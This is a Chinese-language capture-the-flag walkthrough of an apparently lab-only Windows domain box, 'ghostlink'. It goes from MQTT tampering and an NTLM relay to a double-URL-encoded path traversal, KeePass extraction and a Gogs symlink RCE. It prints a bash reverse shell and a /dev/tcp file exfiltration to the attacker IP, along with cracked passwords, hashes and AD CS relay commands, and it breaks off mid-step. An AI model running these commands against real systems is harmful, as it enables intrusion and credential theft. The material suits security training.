ghostlink

1
2
3
4
ip a
10.129.26.130

TARGET="10.129.26.130"

01.信息搜集

靶机发现

目标靶机 ip 为

端口发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
fscan -h $TARGET > fscan.log

# ===== 开放端口 =====
10.129.26.130:53
10.129.26.130:445
10.129.26.130:80
10.129.26.130:636
10.129.26.130:135
10.129.26.130:88
10.129.26.130:139
10.129.26.130:389
10.129.26.130:3268
10.129.26.130:3269
10.129.26.130:1883
10.129.26.130:5985
# ===== Web服务 =====
http://10.129.26.130:139 //404
http://10.129.26.130:80 // 一个视频
http://10.129.26.130:5985 //404


grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+:[0-9]+' result.txt | sed 's/^.*://' | sort -nu

两个 http 一个 mqtt 服务

02.渗透打点

端口扫描

1
2
3
sudo nmap -sT -sV -sC -O -p 53,80,88,135,139,389,445,636,1883,3268,3269,5985 $TARGET -oA nmapscan/detail

sudo nmap -Pn -sV -A -p 445 -T4 $TARGET
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ghost Protocol Zero
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-10 11:47:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.ghostlink.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb
| Not valid before: 2026-03-03T16:53:53
|_Not valid after: 2027-03-03T16:53:53
445/tcp open microsoft-ds?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.ghostlink.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb
| Not valid before: 2026-03-03T16:53:53
|_Not valid after: 2027-03-03T16:53:53
1883/tcp open mqtt
| mqtt-subscribe:
| Topics and their most recent payloads:
| $SYS/brokers/client_status/mqttui-cf2ab236: {"status":"offline", "username":"(null)","ts":1783684119609,"reason_code":"0","client_id":"mqttui-cf2ab236","IPv4":"127.0.0.1"}
| $SYS/brokers/client_status/mqttui-c1cc214e: {"status":"online", "username":"(null)", "ts":1783684123903,"proto_name":"MQTT","keepalive":60,"return_code":"0","proto_ver":4,"client_id":"mqttui-c1cc214e","clean_start":1, "IPv4":"127.0.0.1"}
|_ $SYS/brokers/client_status/mqttui-a2bec8ca: {"status":"offline", "username":"(null)","ts":1783684121807,"reason_code":"0","client_id":"mqttui-a2bec8ca","IPv4":"127.0.0.1"}
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.ghostlink.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb
| Not valid before: 2026-03-03T16:53:53
|_Not valid after: 2027-03-03T16:53:53
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: ghostlink.htb, Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.ghostlink.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.ghostlink.htb
| Not valid before: 2026-03-03T16:53:53
|_Not valid after: 2027-03-03T16:53:53
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2022
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

517.54 ms 10.10.16.1
2 777.04 ms ghostlink.htb (10.129.26.130)

这里信息量挺大的

mqtt 1883

首先是 mqtt , Nmap 自带的 mqtt-subscribe 脚本直接帮我们枚举出了 Topic(主题)。输出中出现了 $SYS/brokers/client_status/mqttui-xxx,证明该服务允许匿名订阅。

1
2
3
4
 Topics and their most recent payloads:
| $SYS/brokers/client_status/mqttui-cf2ab236: {"status":"offline", "username":"(null)","ts":1783684119609,"reason_code":"0","client_id":"mqttui-cf2ab236","IPv4":"127.0.0.1"}
| $SYS/brokers/client_status/mqttui-c1cc214e: {"status":"online", "username":"(null)", "ts":1783684123903,"proto_name":"MQTT","keepalive":60,"return_code":"0","proto_ver":4,"client_id":"mqttui-c1cc214e","clean_start":1, "IPv4":"127.0.0.1"}
|_ $SYS/brokers/client_status/mqttui-a2bec8ca: {"status":"offline", "username":"(null)","ts":1783684121807,"reason_code":"0","client_id":"mqttui-a2bec8ca","IPv4":"127.0.0.1"}

域名信息

Domain: ghostlink.htb
DNS:dc 01.ghostlink.htb

smb 445

注意smb2-security-mode 显示 Message signing enabled and required。
这意味着无法直接进行 SMB 中继攻击(即不能把捕获的 NTLM 中继到 445 端口)。所以后续使用ntlmrelayx时,必须加上–no-smb-server并指定 -t http:// ,将认证中继到 80 端口的 Web 应用,而不是 SMB

1
2
3
4
5
6
Host script results:
| smb2-time:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: 7h59m58s

UDP 扫描

1
sudo nmap -sU --top-ports 20 $TARGET -oA nmapscan/udp
1
2
3
4
5
6
PORT      STATE         SERVICE
53/udp open domain
67/udp open|filtered dhcps
68/udp open|filtered dhcpc
69/udp open|filtered tftp
123/udp open ntp

03.渗透测试

先配置 hosts

1
echo "10.129.26.130 ghostlink.htb" | sudo tee -a /etc/hosts

连接 mqtt

1
2
# 安装client
brew install mqttui

匿名订阅

1
./mqttui -b mqtt://ghostlink.htb



订阅到的主题中出现了两个内部主机名:

gpz-op26-secure.ghostlink.htb —— 一个安全文件共享应用(需认证)

gpz-op26-toolkits.ghostlink.htb —— Gogs 代码托管服务(版本 0.13.3)

1
2
3
4
echo "10.129.26.130 dc01.ghostlink.htb" | sudo tee -a /etc/hosts

echo "10.129.26.130 gpz-op26-secure.ghostlink.htb" | sudo tee -a /etc/hosts
echo "10.129.26.130 gpz-op26-toolkits.ghostlink.htb" | sudo tee -a /etc/hosts

secure 需要账号密码

toolkits

toolkits 显示 Git 服务

看看用户列表

1
2
3
4
5
vroth Vesper Roth
nvirelli Nyx Virelli
gpz-tools-admin
zkovacs Zara Kovacs
ohexley Orin Hexley

“对不起,注册邮箱确认功能已被关闭。” 无法注册用户

找找 CVE

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
### Web 指纹识别
whatweb http://gpz-op26-toolkits.ghostlink.htb \
--log-json ./scans/whatweb.json | tee ./scans/whatweb-output.txt

输出:

[200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx], IP[10.129.26.108],
Script[module], Title[Langflow], UncommonHeaders[x-content-type-options,referrer-policy,content-security-policy],
X-UA-Compatible[IE=edge], nginx

提取关键指纹:
{
jq -r '.[].plugins | keys[]' ./scans/whatweb.json
jq -r '.[].plugins.Title.string[0] // empty' ./scans/whatweb.json
} | grep -v -E '^(Country|IP|Script|UncommonHeaders|X-UA-Compatible|HTTPServer)$' \
| sort -u > ./scans/tech-stack.txt


# gogs

### CVE 漏洞扫描

#### 创建目标列表
echo "http://gpz-op26-toolkits.ghostlink.htb" > ./scans/live-urls.txt //不要带子目录


#### Nuclei 指纹定向扫描 // -tags 手动填写
nuclei -disable-update-check \
-l ./scans/live-urls.txt \
-t /Users/choco/Project/HackTool/templates/nuclei-templates/ \
-t /Users/choco/Project/HackTool/templates/community/ \
-tags gogs \
-o ./scans/nuclei-results.txt \
-jsonl -j ./scans/nuclei-results.jsonl

#### Nuclei 全量扫描
nuclei -disable-update-check \
-l ./scans/live-urls.txt \
-t /Users/choco/Project/HackTool/templates/nuclei-templates/ \
-t /Users/choco/Project/HackTool/templates/community/ \
-o ./scans/nuclei-results.txt \
-jsonl -j ./scans/nuclei-results.jsonl

#### 命中 CVE 提取

grep -oE 'CVE-\d{4}-\d+' ./scans/nuclei-results.txt | sort -u > ./scans/hit-cves.txt

# CVE-2025-8110

#### 查找 PoC

while read cve; do
echo ">>> 处理 $cve"
/Users/choco/Project/HackTool/tools/cve-find.sh "$cve"
done < ./scans/hit-cves.txt

/Users/choco/Project/HackTool/tools/poc-find.sh CVE-2025-8110
https://github.com/zAbuQasem/gogs-CVE-2025-8110

这里 nuclei 的查找还是不太行 直接在文件夹里面搜还快些
或者 jq -r '[."template-id", ."matched-at", ."template-path"] | @tsv' ./scans/nuclei-results.jsonl 看看命中了哪些 yaml

CVE-2025-8110

Authenticated users can exploit improper symbolic link handling in the PutContents API to overwrite files outside the repository by committing a symlink pointing to sensitive targets, leading to remote code execution.

1

需要登录进 gogs

获取身份认证凭据

Net-Ntlm relay 攻击的大致思路就是在 Ntlm 协议认证的第三步,通过获取 hash 值,然后进行重放到服务器上进行验证。所以我们这里大致分为两步,第一步是获得 Net-Ntlm hash 值,然后是进行重放。

入口(触发点):MQTT 服务允许匿名修改 Topic(主题),我们可以让 svc_canary 主动访问我们。
出口(目标点):http://gpz-op26-secure.ghostlink.htb 这个文件共享应用支持 NTLM 认证。
漏洞:SMB(445)开启了签名(Message Signing),无法中继到 SMB,但 HTTP 不需要签名,所以能中继到 Web 应用。

那么想办法共享到出口的身份凭据就好了

Attacker 转发

使用 ghostsurf
https://github.com/senderend/ghostsurf

补丁:
vim lib/relay/utils/config.py
52 行 self.remove_target = False

我们中继的是 HTTP 而非 SMB,必须禁用 SMB 服务器,并开启 SOCKS 代理以便后续浏览器访问

1
./ghostsurf -t http://gpz-op26-secure.ghostlink.htb -r -k --http-port 8888 --no-smb-server

HTTP 端口 8888:等待靶机连接
SOCKS 端口 1080:等待我们的浏览器连接

篡改 MQTT 消息 钓鱼触发

我们现在要修改 MQTT 中的健康检查 Topic,让 svc_canary 服务去访问我们的陷阱服务器(端口 8888)。

操作:读取当前 Topic 内容,将 url 字段修改为我们的 IP 和端口,然后发布回去。攻击机 ip 10.10.17.11

1
2
3
4
5
6
7
8
9
# 原始 Payload(查看):
{"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"gpz-op 26-secure.ghostlink.htb/healthcheck","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}}

# 修改后的 Payload(发布):
{"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"http://10.10.17.11:8888","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}}


# 发布命令(使用 mqttui):
mqttui -b mqtt://ghostlink.htb publish -r "GhostProtocolZero/systems/node/secureshare/healthcheck" '{"timestamp":"2026-03-03-09:26:21","node":"node-6","telemetry":{"healthy":true,"url":"http://10.10.17.11:8888","lastCheckSecAgo":45,"responseCode":"200","ip":"172.16.20.10"}}'

握手与中继 自动完成

svc_canary 访问我们:后端服务读取 MQTT 消息,用 HTTP GET 请求 http://10.10.14.2:8888

陷阱服务器回复 401:ghostsurf 返回 401 Unauthorized,附带 WWW-Authenticate: NTLM 头。

svc_canary 发起 NTLM 握手:它计算自己的 NTLM 哈希,封装在 HTTP 头 Authorization: NTLM base64>中发回来。
ghostsurf 瞬间转发:工具收到这个数据包,不进行任何修改,直接原样发送给 http://gpz-op26-secure.ghostlink.htb。
目标应用认证通过:文件共享应用验证成功,返回 200 OK 和页面内容。
此时,ghostsurf 控制台会打印:

1
2
[*] (HTTP): Authenticating connection from GHOSTLINK/ SVC_CANARY@10.129.244.158 against http://gpz-op26-secure.ghostlink.htb SUCCEED [1]
[*] SOCKS: Adding GHOSTLINK/ SVC_CANARY@gpz-op26-secure.ghostlink.htb (80) to active SOCKS connection. Enjoy

SOCKS 代理访问

浏览器配置(firefox)
设置 -> 网络设置 -> 手动代理配置。
SOCKS 主机:127.0.0.1,端口 1080,选择 SOCKS v 5。
勾选“对 DNS 使用 SOCKS v 5 代理”(避免本地 DNS 解析泄露)
配置好后,在浏览器访问 http://gpz-op26-secure.ghostlink.htb

上传一个文件看看 拿不到回显

看看 net
http://gpz-op26-secure.ghostlink.htb/api/upload

1
2
3
4
curl -x socks5h://127.0.0.1:1080 \
-F "file=@./1..txt" \
-F "note=test" \
http://gpz-op26-secure.ghostlink.htb/api/upload -v

会拿到 /api/download 的端口
用路径遍历漏洞下载系统文件(如 ntuser.dat)。构造双重 URL 编码的路径

1
2
3
4
5
6
7
8
9
10
# kali
regripper -r ntuser.dat -a | grep -i recent -A 3 -B 3

Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
LastWrite Time: 2026-05-13 01:56:02Z

Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.zip
LastWrite Time 2026-05-13 01:56:02Z
MRUListEx = 0
0 = db.zip

看到 db.zip

注册表中的 RecentDocs 对应的是 %USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\ 目录下的 .lnk 快捷方式文件。

所以 db.zip 的真实路径是:

C:\Users\svc_canary\AppData\Roaming\Microsoft\Windows\Recent\db.zip.lnk

使用和之前完全一样的双重 URL 编码绕过,通过 /api/download/ 下载这个 .lnk 文件

1
2
3
4
5
6
7
8
9
10
11
12
curl -x socks5h://127.0.0.1:1080 \
"http://gpz-op26-secure.ghostlink.htb/api/download/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%2575%2573%2565%2572%2573%255c%2573%2576%2563%255f%2563%2561%256e%2561%2572%2579%255c%2541%2570%2570%2544%2561%2574%2561%255c%2552%256f%2561%256d%2569%256e%2567%255c%254d%2569%2563%2572%256f%2573%256f%2566%2574%255c%2557%2569%256e%2564%256f%2577%2573%255c%2552%2565%2563%2565%256e%2574%255c%2564%2562%252e%257a%2569%2570%252e%256c%256e%256b" \
-o db.zip.lnk

strings db.zip.lnk

OPERAT~1
MANAGE~1
db.zip
C:\Users\svc_canary\Documents\Operations\Management\db.zip
gpz-op26-secure
1SPS

拿到真实路径后,再次构造编码路径下载这个 db.zip 文件

1
2
3
4
5
6
7
8
curl -x socks5h://127.0.0.1:1080 \
"http://gpz-op26-secure.ghostlink.htb/api/download/%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%32%65%25%32%65%25%35%63%25%37%35%25%37%33%25%36%35%25%37%32%25%37%33%25%35%63%25%37%33%25%37%36%25%36%33%25%35%66%25%36%33%25%36%31%25%36%65%25%36%31%25%37%32%25%37%39%25%35%63%25%34%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%37%33%25%35%63%25%34%66%25%37%30%25%36%35%25%37%32%25%36%31%25%37%34%25%36%39%25%36%66%25%36%65%25%37%33%25%35%63%25%34%64%25%36%31%25%36%65%25%36%31%25%36%37%25%36%35%25%36%64%25%36%35%25%36%65%25%37%34%25%35%63%25%36%34%25%36%32%25%32%65%25%37%61%25%36%39%25%37%30" \
-o db.zip

unzip db.zip
Archive: db.zip
inflating: db.kdbx
inflating: .key.keyx

成功拿到了 KeePass 数据库(db.kdbx)和密钥文件(.key.keyx)

kali 解一下数据库 看看登录凭据

1
kpcli --kdb db.kdbx --key .key.keyx5

这里 key 是明文字符串 得用 keepass

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
python3 -c "
from pykeepass import PyKeePass
kp = PyKeePass('db.kdbx', keyfile='.key.keyx')
for entry in kp.entries:
print(f'{entry.title}: {entry.password}')
"
core-telecom.ghostlink.htb: None
energy-grid.ghostlink.htb: None
transport.ghostlink.htb: None
dc01.ghostlink.htb: None
gpz-op26-secure.ghostlink.htb: None
gpz-op26-toolkits.ghostlink.htb: None
Nyx Virelli: None
Kael Draven: None
Zara Kovacs: None
Orin Hexley: None
Vesper Roth: mOo03jpsqx8JQYMBwvFP
Dax Soren: None
Lyra Noctis: None
Domain Password Policy: None

也就是

账号密码

用户:Vesper Roth
用户名:vroth
密码:mOo03jpsqx8JQYMBwvFP

toolkits 登录成功 可以 cve 了

POC

parser.add_argument(“-u”, “–url”, required=True, help=”Gogs base URL”)
parser.add_argument(“-lh”, “–host”, required=True, help=”Attacker host”)
parser.add_argument(“-lp”, “–port”, required=True, help=”Attacker port”)
parser.add_argument(“-x”, “–proxy”, action=”store_true”, help=”Use proxy”)

(账号密码在脚本里硬编码)

1
2
3
nc -lv 9001

python3 poc.py -u http://gpz-op26-toolkits.ghostlink.htb -lh 10.10.17.11 -lp 9001

报错 Registration failed: 403
[-] Error: Registration failed

前面知道这个网址关闭了注册功能 所以得手动去掉 main 函数里面的 register(session, args.url, username, password)

然后 python3 poc.py -u http://gpz-op26-toolkits.ghostlink.htb -lh 10.10.17.11 -lp 9001

04.提权

git

找点有价值的东西

1
2
3
4
5
6
7
8
9
10
git@gpz-op26-toolkits:~/data$ ls -liah
ls -liah
total 412K
1704 drwxr-xr-x 6 git git 4.0K Jul 10 11:55 .
1700 drwxr-xr-x 7 git git 4.0K Jul 10 11:54 ..
1720 drwxr-xr-x 2 git git 4.0K Mar 4 12:13 avatars
1730 -rw-r--r-- 1 git git 388K Jul 10 11:55 gogs.db
1713 drwx------ 18 git git 4.0K Jul 10 08:37 sessions
1712 drwxr-xr-x 2 git git 4.0K Mar 4 00:29 ssh
2437 drwxr-xr-x 3 git git 4.0K Jul 10 11:53 tmp

Gogs 的数据库(SQLite)包含所有用户的密码哈希。我们把它弄回攻击机

1
2
3
4
5
nc -lv 4444 > gogs.db

base64 -w0 /opt/gogs/data/gogs.db > /dev/tcp/10.10.17.11/4444

base64 -d -i gogs.b64 > gogs.db

解哈希

提取数据库

1
2
3
4
5
6
sqlite3 gogs.db "select name, hex(passwd), salt from user;"
vroth|31323532386261363431386139373431353738613333653037353962326538333735343730323639623732303036396363616233386635633163623363323837653462663331396361376264373030643964386137333935613432323265356162333236|6y62BTJVSO
nvirelli|38643962336130316333613032363062333964623031316165643164626632333962386231623238616636313431663238616130316433623361623866666434343038626335623930363566663935376537313633373561376265633137353564336538|DW3YdxPy25
gpz-tools-admin|65633561376139666333343137383436623762616566326433303165396130626561656366323030666435663333616132333563373263326230613230366635383265616230353333326436653637393963373861343533383762326237666537303134|CIRi441QwX
zkovacs|61376462626537663535643265346136366538653761613166306664643563616464646263336665346430366130363037383265316235393835393539343631363935656139646130383936353330393962323231633064633332366361616430316132|qMOaBu0l1B
ohexley|36623238366638396466313736616536343035646337356363343336663062363439336564326332396130623663313336336331313162323262323330373565626437393063343031356533313564646233643737306333663763616139376436363230|OEVEC4I5Io

hash.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import binascii, base64

users = [
("vrotch", "31323532386261363431386139373431353738613333653037353962326538333735343730323639623732303036396363616233386635633163623363323837653462663331396361376264373030643964386137333935613432323265356162333236", "6y62BTJVSO"),
("nvirelli", "38643962336130316333613032363062333964623031316165643164626632333962386231623238616636313431663238616130316433623361623866666434343038626335623930363566663935376537313633373561376265633137353564336538", "DW3YdxPy25"),
("gpz-tools-admin", "65633561376139666333343137383436623762616566326433303165396130626561656366323030666435663333616132333563373263326230613230366635383265616230353333326436653637393963373861343533383762326237666537303134", "CIRi441QwX"),
("zkovacs", "61376462626537663535643265346136366538653761613166306664643563616464646263336665346430366130363037383265316235393835393539343631363935656139646130383936353330393962323231633064633332366361616430316132", "qMOaBu0l1B"),
("ohexley", "36623238366638396466313736616536343035646337356363343336663062363439336564326332396130623663313336336331313162323262323330373565626437393063343031356533313564646233643737306333663763616139376436363230", "OEVEC4I5Io")
]

for name, hash_hex, salt_str in users:
hash_bytes = binascii.unhexlify(hash_hex)
b64_hash = base64.b64encode(hash_bytes).decode()
b64_salt = base64.b64encode(salt_str.encode()).decode()
print(f"sha256:10000:{b64_salt}:{b64_hash}")
1
2
3
4
sha256:10000:RFczWWR4UHkyNQ==:OGQ5YjNhMDFjM2EwMjYwYjM5ZGIwMTFhZWQxZGJmMjM5YjhiMWIyOGFmNjE0MWYyOGFhMDFkM2IzYWI4ZmZkNDQwOGJjNWI5MDY1ZmY5NTdlNzE2Mzc1YTdiZWMxNzU1ZDNlOA==
sha256:10000:Q0lSaTQ0MVF3WA==:ZWM1YTdhOWZjMzQxNzg0NmI3YmFlZjJkMzAxZTlhMGJlYWVjZjIwMGZkNWYzM2FhMjM1YzcyYzJiMGEyMDZmNTgyZWFiMDUzMzJkNmU2Nzk5Yzc4YTQ1Mzg3YjJiN2ZlNzAxNA==
sha256:10000:cU1PYUJ1MGwxQg==:YTdkYmJlN2Y1NWQyZTRhNjZlOGU3YWExZjBmZGQ1Y2FkZGRiYzNmZTRkMDZhMDYwNzgyZTFiNTk4NTk1OTQ2MTY5NWVhOWRhMDg5NjUzMDk5YjIyMWMwZGMzMjZjYWFkMDFhMg==
sha256:10000:T0VWRUM0STVJbw==:NmIyODZmODlkZjE3NmFlNjQwNWRjNzVjYzQzNmYwYjY0OTNlZDJjMjlhMGI2YzEzNjNjMTExYjIyYjIzMDc1ZWJkNzkwYzQwMTVlMzE1ZGRiM2Q3NzBjM2Y3Y2FhOTdkNjYyMA==

hashcat

1
2
3
hashcat -a 0 -m 10900 sha256:10000:RFczWWR4UHkyNQ==:jZs6AcOgJgs52wEa7R2/I5uLGyivYUHyiqAdOzq4/9RAi8W5Bl/5V+cWN1p77BdV0+g= ./trimmed.txt

sha256:10000:RFczWWR4UHkyNQ==:jZs6AcOgJgs52wEa7R2/I5uLGyivYUHyiqAdOzq4/9RAi8W5Bl/5V+cWN1p77BdV0+g=:u47YUclrDiwWxBheaSzI

那就 DW3YdxPy25 // u47YUclrDiwWxBheaSzI 对应 用户 nvirelli

nvirelli

1
2
3
4
5
su nvirelli
u47YUclrDiwWxBheaSzI

/bin/bash -c 'bash -i >& /dev/tcp/10.10.17.11/9002 0>&1'
nc -lv 9002

windows 的话后续应该是考虑域渗透

域渗透

1
2
3
4
5
6
7
8
9
wget https://github.com/jpillora/chisel/releases/download/v1.11.7/
# 攻击机
chisel_1.11.7_darwin_amd64.gz
# 靶机
chisel_1.11.7_linux_amd64.gz

gunzip chisel_1.11.7_linux_amd64.gz
chmod +x chisel_1.11.7_linux_amd64
mv chisel_1.11.7_linux_amd64 chisel

攻击机服务端开启

1
2
./chisel server -p 8000 --reverse &
python3 -m http.server 8080

靶机下载 chisel 反连

1
2
3
4
wget http://10.10.17.11:8080/chisel -O /tmp/chisel
chmod +x /tmp/chisel

/
1
2
3
4
5
6
7
8
9
10
11
12
13
mkdir -p ~/.config/proxychains
cat > ~/.config/proxychains/proxychains.conf << 'EOF'
strict_chain
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
localnet 127.0.0.0/255.0.0.0
quiet_mode

[ProxyList]
socks5 127.0.0.1 1080
EOF

以后每次运行 proxychains 4 时,用 -f 指定这个文件:

1
proxychains 4 -f ~/.config/proxychains/proxychains.conf -q cmd
1
2
echo 'alias pc="proxychains 4 -f ~/.config/proxychains/proxychains.conf -q"' >> ~/.zshrc
source ~/.zshrc
1
2
3
4
5
6
7
8
9
10
pc curl -I http://dc01.ghostlink.htb

HTTP/1.1 200 OK
Content-Length: 682
Content-Type: text/html
Last-Modified: Thu, 26 Feb 2026 20:18:12 GMT
Accept-Ranges: bytes
ETag: "36a06185da7dc1:0"
Server: Microsoft-IIS/10.0
Date: Fri, 10 Jul 2026 17:23:06 GMT
1
2
3
4
5
pc certipy find -u 'nvirelli@ghostlink.htb' -p u47YUclrDiwWxBheaSzI -dc-host dc01.ghostlink.htb -ns 10.129.26.130 -dns-tcp -timeout 10 -vulnerable -stdout

sudo certipy relay -ca 'ghostlink-GPZ-OP26-SECURE-CA' -target rpc://10.129.26.130 -template DomainController

coercer coerce -l 10.10.17.11 -t 10.129.26.130 -d ghostlink.htb -u nvirelli -p 'u47YUclrDiwWxBheaSzI' --dc-ip 10.129.26.130 --always-continue

这里要找域控 DC 的 ip 但是靶机里半天找不到
可以回头去./mqttui -b mqtt://ghostlink.htb